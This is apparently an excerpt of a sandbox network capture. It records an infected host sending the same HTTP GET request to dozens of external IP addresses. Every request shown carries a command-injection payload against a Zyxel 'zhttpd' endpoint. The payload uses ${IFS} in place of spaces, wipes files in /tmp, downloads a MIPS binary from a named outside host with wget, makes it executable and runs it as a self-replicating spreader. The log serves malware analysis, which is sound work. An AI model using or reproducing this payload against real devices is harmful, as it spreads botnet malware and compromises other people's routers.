                                    Jan 13, 2024 19:02:44.428179979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7007192.168.2.135207681.100.169.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428205967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7008192.168.2.1333088115.88.0.149443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428250074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7009192.168.2.1341540183.233.212.138443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428296089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7010192.168.2.1351956102.130.128.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428342104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7011192.168.2.1336352135.145.212.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428390026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7012192.168.2.1352206219.94.96.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428436041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7013192.168.2.135259065.92.204.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428484917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7014192.168.2.1347348192.145.242.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428544998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7015192.168.2.1351846210.189.224.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428622007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7016192.168.2.1356532101.206.178.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428687096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7017192.168.2.1340188151.40.41.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428704977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7018192.168.2.1359964110.37.128.229443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428802013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7019192.168.2.13510981.221.175.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428832054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7020192.168.2.1350228196.155.14.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428891897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7021192.168.2.1342808179.140.89.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.428935051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7022192.168.2.1350368155.216.241.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429023027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7023192.168.2.1344066219.240.169.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429059029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7024192.168.2.1354354189.60.164.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429086924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7025192.168.2.135307225.8.111.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429145098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7026192.168.2.135804463.3.163.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429177046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7027192.168.2.1339080116.53.131.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429235935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7028192.168.2.1357580132.250.217.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429274082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7029192.168.2.135922040.42.18.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429322958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7030192.168.2.1343986194.28.226.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429384947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7031192.168.2.1355228191.239.141.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429404974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7032192.168.2.133575668.166.19.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429486990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7033192.168.2.1337920205.20.72.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429506063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7034192.168.2.1335332180.59.84.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429524899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7035192.168.2.135807084.245.249.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429599047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7036192.168.2.133438468.102.123.180443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429660082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7037192.168.2.1349458145.226.134.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429699898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7038192.168.2.135352236.211.82.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429729939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7039192.168.2.135829086.236.60.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429775953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7040192.168.2.1354620169.64.146.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429867029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7041192.168.2.1336280204.1.13.58443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429913998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7042192.168.2.133577092.103.127.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.429980040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7043192.168.2.1347362153.193.104.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430049896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7044192.168.2.1359944144.132.180.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430107117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7045192.168.2.1336080176.195.1.96443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430169106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7046192.168.2.1345396134.179.21.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430222034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7047192.168.2.1341350198.211.111.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430279016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7048192.168.2.1355712209.201.176.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430305004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7049192.168.2.135231059.23.62.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430382967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7050192.168.2.1354886174.87.220.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430433989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7051192.168.2.1358396159.96.64.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430461884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7052192.168.2.1347542131.2.206.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430499077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7053192.168.2.1344446158.250.231.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430577993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7054192.168.2.1338256162.172.167.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430656910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7055192.168.2.134216245.7.42.164443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430721045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7056192.168.2.1351660148.174.128.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430763006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7057192.168.2.1335792164.137.83.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430839062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7058192.168.2.1351140148.89.63.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430872917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7059192.168.2.1348742118.88.30.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.430916071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7060192.168.2.1342214218.107.188.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431008101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7061192.168.2.135030276.40.62.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431063890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7062192.168.2.1353844136.92.43.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431113958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7063192.168.2.1334824188.129.99.16443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431163073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7064192.168.2.1349680164.213.93.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431252003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7065192.168.2.1351918183.64.33.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431296110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7066192.168.2.1352170204.226.95.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431360006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7067192.168.2.134443625.102.249.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431420088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7068192.168.2.1358882188.108.65.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:44.431479931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7069192.168.2.1347376164.89.89.120443
                                    TimestampBytes transferredDirectionData
